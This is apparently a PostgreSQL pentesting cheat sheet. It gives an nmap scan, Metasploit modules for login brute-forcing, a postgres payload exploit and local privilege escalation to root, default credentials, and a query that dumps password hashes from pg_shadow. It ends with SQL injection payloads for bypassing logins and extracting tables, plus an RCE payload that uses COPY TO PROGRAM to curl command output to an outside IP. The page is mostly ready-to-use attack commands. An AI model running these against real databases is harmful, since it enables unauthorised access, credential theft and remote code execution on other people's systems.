Skip to content

5432 - Pentesting postgres

PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses.

nmap


sudo nmap -sV -Pn -vv -p 5432 $IP

metasploit


metasploit - version

use auxiliary/scanner/postgres/postgres_version
use auxiliary/scanner/postgres/postgres_login
metasploit - postgres - 8.3.1 + udev_netlink
use exploit/linux/postgres/postgres_payload
|-> getuid => postgres 
use exploit/linux/local/udev_netlink
|-> getuid => root

default users


user pass
postgres postgres
postgres password

connect


local

psql -U postgres
local docker
docker exec -it psql-db-1 psql -U postgres
remote
psql -h $IP -U postgres -W
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W -d <database>

commands


\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
Select user;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;

# Get history of commands executed
\s

sql injection


basic

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
version
SELECT version()
list of tables
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
list of columns
x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x
RCE
x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x